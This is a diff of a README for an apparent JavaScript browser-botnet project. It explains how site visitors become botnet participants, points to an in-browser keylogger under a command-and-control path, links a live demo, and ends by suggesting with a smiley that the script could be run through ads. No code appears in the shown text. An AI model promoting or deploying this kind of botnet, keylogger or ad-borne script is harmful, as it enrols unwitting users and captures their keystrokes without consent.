ardvarknet/JS-BotNet/README.md

 For voluntary participants have them upload node.js to their website.
 Then anyone running that JavaScript file will be a willing participant in your botnet.
 If you navigate to /BotNet/CC/KeyLogger you can set up an experimental in browser keylogger.

+# Demo
+You can view a demo of a sample HiveMind Node here:  http://botnet.ardvark.net

 *It has been proven possible to run javascript in ads so thats an idea to think about :)*